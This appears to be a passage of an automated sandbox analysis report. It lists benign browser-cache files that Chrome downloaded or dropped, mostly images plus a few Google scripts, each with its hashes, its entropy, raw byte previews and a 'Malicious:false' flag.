                                                                                                                                                                                                                                                                                          Preview:......JFIF.....H.H.....LExif..MM.*...................i.........&.............................).......8Photoshop 3.0.8BIM........8BIM.%..................B~...(ICC_PROFILE.......appl....mntrRGB XYZ ............acspAPPL....APPL...........................-appl....8.G.m..Oz../................................desc.......0cprt...,...Pwtpt...|....rXYZ........gXYZ........bXYZ........rTRC....... chad.......,bTRC....... gTRC....... mluc............enUS.........D.i.s.p.l.a.y. .P.3mluc............enUS...4.....C.o.p.y.r.i.g.h.t. .A.p.p.l.e. .I.n.c...,. .2.0.2.2XYZ ...............,XYZ ..........=.....XYZ ......J....7....XYZ ......(8.......para..........ff......Y.......[sf32.......B.......&.......................n......)...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2385
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9000882516009545
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:pHFt5DAHPdWpugzz7hBv+lKMZNVoX0pnyMTEU1D94D7ynBkcSMz3dF6xR:alId7nCvxC0p7TEByScSW6/
                                                                                                                                                                                                                                                                                          MD5:81B52D386AF9045F0AD9DF45D6E66680
                                                                                                                                                                                                                                                                                          SHA1:7C8A359105D9C714D559F2D34BBE467596F28B76
                                                                                                                                                                                                                                                                                          SHA-256:AA0592466BFEA130E577DD569CF96EE975CDEB7ABE28D6D4F73B7E709DB2AED3
                                                                                                                                                                                                                                                                                          SHA-512:FB27889C9CF80F8DE9BDB233321A120FA9AB9FC59557EE4D4C9F4F4AABD76AAA59C47F6F48A86EC2B3E47DA67684F53C72B0DB18A303509FC547371C9F2538E5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/Q4UDu0hKQgAyUzO0RpJTpTKc2DyaZbU-K96JCJjqKd9_ABetMMpS6LxO6Y7Ypm2CVhCro4n4n9PTF97SlwrSjmJFaHdV-_yDr8MpX1M=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2....IDATx...m.\U......{gvwv...viK.R..B+...QI.%D.4...S..j......BH}a....5QL...QbP..DeAih.@.....v.O....}...;O....?ov.9.....s....c.1..c.1..c.1..c.1..c.E.UQ..}.r.{!^..Z@....N....p.k..h..r..x}.y.)6......n.,..5.MW....?.;..0_U....Hy-Rz7na#....5.[.b....%.z}Z.N.y%Q.?}_..z.k]......-^..Tu.G7z.GQt..T..:.sw... (.#I.h.8...9....yU...[.Oc.t..................sE\.]g.B4..I.QI@.E...m.8..p.'jY...w...I....Z...Z.."..'7....>\S.U..D.....V.2..;......u.. g..{!......:..[] ...W.[.2U..c...._....o ..J..O...x.8....W.4....j./....{6._....S.2On..H...rCD..|~t_i.be.....v5..R...x.m...&...e...W.n..o.r...L.....l..<....xoq{V..#.n..oh.'J...Qu..m".l..n.*....>.;.[.M..t'....p.(.Vu..?y*.H+...S....ofwLS)J!...s...Lj.q....0j.,[.Q .g0.Hj......x./...G..2Y.,.M..?..)+`...!3...E..TE.6.[Y.x.Fw..[_...u....R...'.@........Q..4....x.N.YH....().$
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):67252
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.010564977133134
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:768:uwKohc6yjvmKYbX6Dz7H58CRwmOFTFVjQohT:vhejmK66LH58CRwmOFTPl
                                                                                                                                                                                                                                                                                          MD5:58186283039FD82024FE3CC0F3032916
                                                                                                                                                                                                                                                                                          SHA1:F44F7E80E570FBCD91587C7C0C11A07CD3E5B6C9
                                                                                                                                                                                                                                                                                          SHA-256:288E4AC8729B7339529AD9D622AAB67F2D913F2E5B88136076732E015D643650
                                                                                                                                                                                                                                                                                          SHA-512:911766CCC2533A3C0F8BBCBE8729220818EAB99F15D14328F36F76B0262AA223D8421F1B4F5431A5D3C972A1286FA6045E37193F900E7DEB4FC3A783A3BAFF1F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/fvNhHugJAnsAS2DJW1V3kQ-0lsCTl2eDWV9NW2p4KXStsynp7EjqGSiACH9xSdCIvPvw0z9l_L7kOtfVZH07iQuasGIGWyFqhpdY=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFF....WEBPVP8L..../....u!...B.m2.g..."b..n....O}.....F..`..f..pX$.)..,N.Z.....E..~b.).p....(...W..m..I.B.j.4.E.c.v...tY...R69.IN...-O9..s~........mu.l.c.c.%C.0.I...]......G\..}O^..h.f.2.!7m...'..H.4.1.y...m...m..D.d)..N.8..7N.3sg.}..&.q.?......b......-[.E.>|..$[U..,..eP.*......i$m..W....9.._I.M.y:V.v$J.........-I..I.FA.....7....}3..vW%.5k....~.'..fBm..a.....;.}0O.;.,}.P.m.1^#..F.......m.6z....;`.l2....nv3.9.Y.*9.9.^V..7J.Y./0..>I.....l.v.HG..2c1.........a4.........vs...W..@N..27.j.YM....vY...A.......m\D(1.r.]4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 358 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):24042
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.98083443633452
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:M+abCjZiwuUQAaCaQPJt/c/6kaL+UjFkif1J4VxHGVdU+rTmwhwY8HTvhEQjWwjf:fIC1ziHBKJqSCMf1J401TmwhL8HbhY7g
                                                                                                                                                                                                                                                                                          MD5:DB2EAD3893798B7E8E6ABE56E569E5EF
                                                                                                                                                                                                                                                                                          SHA1:4A0E4D008BD88F366A3C844C42367647B1AD1EE3
                                                                                                                                                                                                                                                                                          SHA-256:4315EDD72C57C641BE25F6759BACBDE3AD2FEB6EE13134A108C3BBD713B33326
                                                                                                                                                                                                                                                                                          SHA-512:EB87FA4D6BEF99081A31F02DBEF541F4574743D8DDF508530211C97BE8A9E3D2FCEEF5F7DE869BEF387865ECE7C801E08446DDC03DB24ACB45CD2E767A807182
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...f..........c......sBIT....|.d... .IDATx...w.]U.....>}f..d..@..H.]jh......{..\..K. H3...XPDAQQ...H(A... H.$.Lz...s.^..3..S&9e..>......9..g......<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<..<.k..w.....1=[...D*.aS.iD...J..BZq...@..I..I.$...T.A..(....*..HV`..(.^..$..K..E..K.n.j..n.[.O.^M..t....r.....5.A...M.......U..+h..d.q......*..8.B......S.PE..].s+T....O..-.s..?....n...j...{......w..}..p..lDF....cAG.).$..A.r..%Y.l.F.]_........_"...h..E.."y...q"+#.^r..s..?..4.V..<..'f.l....]...S...b.I.....1.1C.N...UJ.. C.. ..ZJ....PfE............r.g..`.N.P.9..x...H..@.P.v..~.Yi.]....{.E.e8^...."~......;R......]..?%a.Q.w. ...zs....O...m.Z]..{..*h..e.O.!...........=m.g.....Et{..D...{..X.X.tn@q..C}"..W........O....;..K..{Dd..N..#.j..Q..9#...Hx<_...WL.~..y..E}..M.v...R.>*.%....kmh.C.....;r+P.kT..3.......-.B.+.\p~..a S......_...(.2..,....h.:U.DE......im..o..._.&.@...?....a......d\...D..&...M..24..,*.w.......a.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4883
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.957249280703148
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:oHDOMqOW9A42Gj3lY6uVlltmXoIzcfOVKR13/YYYcWPJUV3+O+EtWwxC:oHDzqOWSGj+TXmXoIzVVKH/ePaTvte
                                                                                                                                                                                                                                                                                          MD5:DD9CE681146E98F99DA3F328FFB195B4
                                                                                                                                                                                                                                                                                          SHA1:0195DA0CEA828BB1E00B4A60A36CCF4DD87A64F7
                                                                                                                                                                                                                                                                                          SHA-256:005A040CA94B0B4D5303B3110D62DC7A664D7A41E7C08B31E68A7C3B5EC99643
                                                                                                                                                                                                                                                                                          SHA-512:FC70ED46CD2378AADA92826060699E63C8C3D0276C62F96926DE4C124D59DE2D450E7DE65390AFFF982166F1596751E7650F3F055FB3275A5378DAB1AD23D9A3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.............sBIT.....O...._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(......Y......1....H...:.C2...`IDATx..]{p\.y.}..K..k%[.dI.._...Q.^.C].i1.....yL..i..J.f(3...4.MH.).f.$.)..........c....%.....}.{...{..wW........{.......s..Q.....X((.] ....JD..%......B....Dt.P".@(.] ....JD..%.......o..G.........R..K..!0C..2\.^..*X1.S.$....v....go...5D......i0X......i.-m._Y.r.Vh...o.......3y..W..!?)....$kC2..z~s..'.?xc..fT}.D.O.~...d..s.......kG.}.*...O.G..Y+.`...;./m:1unc.q!.. @..@..S.t./N..g.......7....e./..9...P&......;>|#.....}[......"Dg....}o.... .......l}...s...M.>y.hK.b.f`..Q...E9'..)........i.........9. ....^.R...R...u./...Ld>!..............:u.,K,......S...x...?].T].V.'.(U?.~..t$......U9.9.L...b}..........3v,..G\..]P>.9..{.....).XlV.w..Q..A.....C..35._..d.q..y.T....e.f..w..&. B...>b..x*8z[....@.:....b.'.kw....WUB. 7.E..D....'.N...u.x1.wG..0%.!........?.#.uU.....1.i.T...Uv/..D..{0d..#.,nW..uo.~
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65255)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):72214
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.327460393102125
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:auJ29KBROpgAEQ9a1tgwA6NSZW3ytdKTdIwEp28Ywz7CDE:f29CakgwdNSQ3yt8eNp28YqCA
                                                                                                                                                                                                                                                                                          MD5:47DA594CBECE0E34A656E6BF2490B7C3
                                                                                                                                                                                                                                                                                          SHA1:2D26F4C060491AC980D09CA687388D3610256EB7
                                                                                                                                                                                                                                                                                          SHA-256:28033E449A31EBCC396E5BE8B13B63152BF03094288FB5867034321927BCE087
                                                                                                                                                                                                                                                                                          SHA-512:EDE1D1C1C6D890AE1DF60FFAB43FE68647FEF9EA131F0A4D33DC28071B4F5015A6EBBCDE01F142F87ADDA04D866A729EA1C972FD5C5E2EF22AC2F09D93BA9272
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*!. * GSAP 3.12.5. * https://gsap.com. * . * @license Copyright 2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com. */..!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t=t||self).window=t.window||{})}(this,function(e){"use strict";function _inheritsLoose(t,e){t.prototype=Object.create(e.prototype),(t.prototype.constructor=t).__proto__=e}function _assertThisInitialized(t){if(void 0===t)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return t}function r(t){return"string"==typeof t}function s(t){return"function"==typeof t}function t(t){return"number"==typeof t}function u(t){return void 0===t}function v(t){return"object"==typeof t}function w(t){return!1!==t}function x(){return"undefined"!=typeof window
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (18038)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18043
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.071225548366322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:xKooO7FErdkUgDoIvdaCPn2F0V9R4hs+k84UIKXgUc3syWLhI1N4FKgjV:xRjFEp+DFv3E0t4hs+k8LXgLsyWSiR
                                                                                                                                                                                                                                                                                          MD5:4E016795A5D4ACB0F42F08DF93B05957
                                                                                                                                                                                                                                                                                          SHA1:BC6F0A8F4B40624916E86A4435A89F651EBBD7D7
                                                                                                                                                                                                                                                                                          SHA-256:89E71AEED0B90DA78F3CEDE1CFA0D313AD1B1763481E125F2C2C0752BCDCCB8E
                                                                                                                                                                                                                                                                                          SHA-512:1F76EB17366ED87FDF25CE821223B2608F148CFF700E7FD4538D22AEEC7E5166D0D44A4D5FD3108C3190BAB38C5F426D15404FFA2723E1783CF4D1FA91BD9FAF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=CsT2Zo-iIaySxc8Pn72EmA8.1727448076583&dpr=1&nolsbt=1
                                                                                                                                                                                                                                                                                          Preview:)]}'.[[["brazilian blimp crash",0,[3,357,362,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["pittsburgh steelers",46,[3,357,362,396,143],{"lm":[],"zf":33,"zh":"Pittsburgh Steelers","zi":"Football team","zl":8,"zp":{"gs_ssp":"eJzj4tDP1TcwLUnLNWD0Ei7ILCkpTiotSs9QKC5JTc1JLSoGAJ_sCus"},"zs":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAABQCAMAAAC5zwKfAAAA+VBMVEX///+lrK8AU5vurR7GDDAAAACss7aepqmpsLOiqaztqQD8/PztpgAAT5nY2Nj29vYAQ5TEAB4AQJPr6+vR1NXOzs7j4+NXVla0tLTuys3FACnEACJdXV27u7vDABmlpaWBgYEASpeMi4s6OTkzMjEaHh9OUlSBh4lfZGZ2e33yxHH21aD10Zb++fIrLjDsoAD77NXlqrAUExLaf4mZmZnUZXLAAABDQ0PP2Oa6x9tsbGz54r3xvmH32qzvtD7wuU/0yoP24eTKNEjWcX3QVWTIIz3qvcLNQVPdkJeQpcdVfK9+mb9tjLg7aqbd5O3hnaQlXqCoudIAKouECGyYAAAGnklEQVRYhb1Y/XuaOhRGJBBEwaogteBnRVmta5lVS9dt3e26ubXdx///x9xAQkj40Hb3ee77QwtJeD0fOScnRxD+bxjmYBx2J6enk244HpjGfyNzw2DqhbOVUoGwoqxmoTcNQvtvSe1NMB9DGSIuAvQow9U82Njaq9naQzBX5JQrBSJV5mDYfh1dGMzkAjJKKs8C5xWUQ7CXjlCC4QvpTODzdCoFT+kD9yV84WmFoVMVpeKaHR2hY7pQURhSWJmEB+nagS8zbNC0iEPP479auwMZTtkPDljSBAoVT
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 425 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):14159
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.885944499704041
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:adfYevTT2mdN2/oZajc3jwqNeyKcTvREyCXQprE:adz2/hjhyKcKyCAp4
                                                                                                                                                                                                                                                                                          MD5:9AAFCE1349E90CDC093ABCA5222FAC0D
                                                                                                                                                                                                                                                                                          SHA1:F5392D43F1D8DDDD0A3C47626A650AEF4E4EB777
                                                                                                                                                                                                                                                                                          SHA-256:15628E790164F24EFCAFA38022947EEA3E6ED4B244B029DB2E67EC16811169AB
                                                                                                                                                                                                                                                                                          SHA-512:5587D4645121D2CDCB3B2C12B12BC6D531FDDB0C90315CDC0571EDF425B17793EC65C00AACCC366343134A34EF4578CBF1597B657648DB76E717A840EAF7F383
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/PtL9QBP58JZC0A0k1u4fSn-rXbpaG52216P0l4ydM3c21L78uPPad73jY6ngd2tS-qu8Ec7jV_oxz8wK70fhBxYrffuWUGmuh-HfMyUsfUJSPQzGuCOW
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.............8......sBIT....|.d... .IDATx...w.\e.>....gf.-I(I.RD..........x...{)*.......C.^.E.........@.=...(.JIBK.s....cf.!.dw3..9g... ..}Bv.....DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.7.:.Q..YX|.............e......]..j.v..D......W}....-..5..Q.X2v.t.sB....^u._...^...QJ...T.B.<..........p........7_...Q.aI...k.w...l......^.....2...&....*..7..E....}.C[?..UU.tDA...jh..1/...X....3(...N....U}..-..o.j.s..<.Q....jd.A..X,D.R.>....F..@.$u.x<........$.Q....j.?..on..._..P..YZV..W...5q..[xQ.lD]aI.....F]]...K.`..7..........mo.>.......XRD5.x.G.1.\JK.........x....+..||I.hD0.....N.=.).D...1fp...k...x..1O...]......GRD5.d.!.YV.j}l.........{...3Q.aI.....c...Y..NV.o....|i..C.}.........j O%.sd...M;JW....).3Q....j .%... ....
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8359)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):242285
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.549645071282266
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:/z5ax8eulMYeiTvG00RlXol0VQbQwM87A0WsEemtJeNk7LDE8:dpmFblq0Ud7esEemveG7Xv
                                                                                                                                                                                                                                                                                          MD5:B792104D07E3F2630638A2D417E57504
                                                                                                                                                                                                                                                                                          SHA1:0F9DC3DDDF0AB7E8B8CB050E7226F7E42A235176
                                                                                                                                                                                                                                                                                          SHA-256:D50DA12425808F5143124CF7A8633E4CF46593D20A7EBE7B715D4F2CA55A1A8F
                                                                                                                                                                                                                                                                                          SHA-512:B15CF0024254B1FB9202942AC67438D6C4CFB85036FA634118CDF93FC9DAE7A81271E3D42AC9B787117A9F87D60BE06EF022D5A50890D672978BE60474803D68
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__j","vtp_name":"navigator.userAgent"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":["macro",2],"vtp_name":"originalLocation"},{"function":"__u","convert_case_to":1,"vtp_component":"QUERY","vtp_queryKey":"utm_source","vtp_customUrlSource":["macro",3],"vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":["template",["macro",1],":",["macro",4]]},{"function":"__dbg"},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__c","vtp_value":"G-W46717PY19"},{"function":"__c","vtp_value":"recovertogether\\.withgoogle\\..*"},{"function":"__c","vtp_value":"G-W467
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8164
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.958796570138763
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:P7WZ6e6Dd1Q0GbQkM1ArCUxAf9EMVtM/GU57C2:P7W8h1Q0Gb9r/AlE+cG0
                                                                                                                                                                                                                                                                                          MD5:509AB59C88711D0071CB4AA0BE726BDF
                                                                                                                                                                                                                                                                                          SHA1:30B8F22D9C0EC7F1D119AF2198CBE22994C29EF9
                                                                                                                                                                                                                                                                                          SHA-256:947AB25349EDE3D639E5C45571441E0D970074286795B63B16B141937104AD1D
                                                                                                                                                                                                                                                                                          SHA-512:5EC50CDEB48F37F83D66F82A88094E8FB3514B7A91A67452182951285C4059D9E98723B9A7069C79F81AAC9E6CEDB3D1D14F2DABA5D255E794B4D6401CE2B1B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/3Vr1H8EL1F2w2g35zmQkqnbbqfM8e28GxuaTXxkovnYV7ldiiKJVqlnFRlIOfurcfZ7XDVJIJ5ET51yXw8_fJkXIzakq30XzVzI6Og=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....sBIT....|.d.....IDATx..}w.\...v.....4.#f.#AH .P@ P ..$...,......-~.]{...v..g.......l.. ,d.L....BBY.:...?n.....==..O_3v..U....9...>.q.Vm...w.ck.c.>nD-&...m-\U[...qO...5,&..._j+9..~....v..cx....%.D.e.$.[..8@...w.H...........F..P..!.=6l......v...U[.J.$..p...M..E..0..E.'.jh.JRY..F....u.._...V].+.^m.*.{_.O.....r...A...1.....`..N....~.}{~....;...T...[7~d..Kj6h. ...t..........s.p.........K./d...`(h.....]...8.8..>.....K.[4.W.u.g.AAS>0.e[>v.WN..qC..D.c.y.a.j.|.....Z..@..?..&:~........%$6'....s.1 .1..y.[...Y......F..9.\.6....Y..p$A+..Z.O$.e..*8...r.s.B.h..8.l......Q.n..?8...h.0...._..c....BLap.L.eB.....>.......]..b....<.{...vt8_.....e#..5.|.~.U...A1.<RV.C..K^..Y.#.V....z.....<....i..U.%.."|...?.[.5..]Bo..!.7..yG..*]..c....?D..C.$\.....L.D<c...N..%oYc.$..c..l....R-..f....2......8MOX....>..v........@..t0"..F.......#4.X4......\-....S.wcB..5.RAE....W........V}.9..{)~...Z.....R.W....w...c............R
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):68
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.722845377728703
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:XLCkoSb9inuMT/+DthGDthtk1:XLnoSb99NGt+
                                                                                                                                                                                                                                                                                          MD5:F7B1FA8A530B6D88332A301E4D2EB9DB
                                                                                                                                                                                                                                                                                          SHA1:B250ACA5BC7644331D3D6499CB0C33E60510FFA9
                                                                                                                                                                                                                                                                                          SHA-256:F38597D0355FC50C88806B7CAC954C9B0C4DB689B020EF24AE97381A6ED4C9D1
                                                                                                                                                                                                                                                                                          SHA-512:10320B73E0ADF827CF52580D667F55779F23F67743E306FEC5DB2CA7458B7023844199C3594C0AE69C6CB140A6AD92DE85E431B8CCD9F75156B4616067E39938
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwnLX6u4VcwUZxIFDWzPNewSBQ2UkJL6Eh4JF5mKUc6D4CASBQ2RYZVOEgUNkWGVThIFDZSQkvo=?alt=proto
                                                                                                                                                                                                                                                                                          Preview:ChIKBw1szzXsGgAKBw2UkJL6GgAKGwoHDZFhlU4aAAoHDZFhlU4aAAoHDZSQkvoaAA==
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):130
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.197104639835039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Cn1ZrYKPqsDVvQV4mqGxRC7CseFxnlfWsryaUwyaAzhPYmTdtln:k1Z0KnDcq6CGsaxnxWsryaUwyLzKmTdX
                                                                                                                                                                                                                                                                                          MD5:9E160C331600A00D4B3642822A13B8C4
                                                                                                                                                                                                                                                                                          SHA1:87DA7E620BB58529A0A0512C9CA1D8ACA8248E77
                                                                                                                                                                                                                                                                                          SHA-256:C1AAC69D58BBD80F23D76AA468E924E32FF1E10FEC534768DA3B770BFC86A3E1
                                                                                                                                                                                                                                                                                          SHA-512:BA1FA5CDB9B0104EE6CB17AEA663AEAB402AFF40F7701E4FD17A85997CB93A72A1FC44E5570E1F2A62A056920AC27A95E48BFD7F8A1F4A12971A0F0B40E793BD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i1!3i6!4i256!2m3!1e0!2sm!3i707457665!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=62619
                                                                                                                                                                                                                                                                                          Preview:RIFFz...WEBPVP8Lm.../..?./..m.8f....ud.....O0..I...,f..h.?..V6...."Ij^.......E...E..F...R......_.........:.;..d>.}..#.$.\..m...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 120x120, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2245
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.719187207240514
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:5qGGMhnidfnfWrnhBsK1rMcZw3sE1iyxVwJ1B9TUmgGxKebh0:xG4nYnfanvsK1rMcZgsEP2LlUPGBh0
                                                                                                                                                                                                                                                                                          MD5:B2D02EFCC5146C9CBAF7AA24C28CC2BD
                                                                                                                                                                                                                                                                                          SHA1:7A75DF3D8393AEE2E1B2B0CA17D5DE7ABD9A70F2
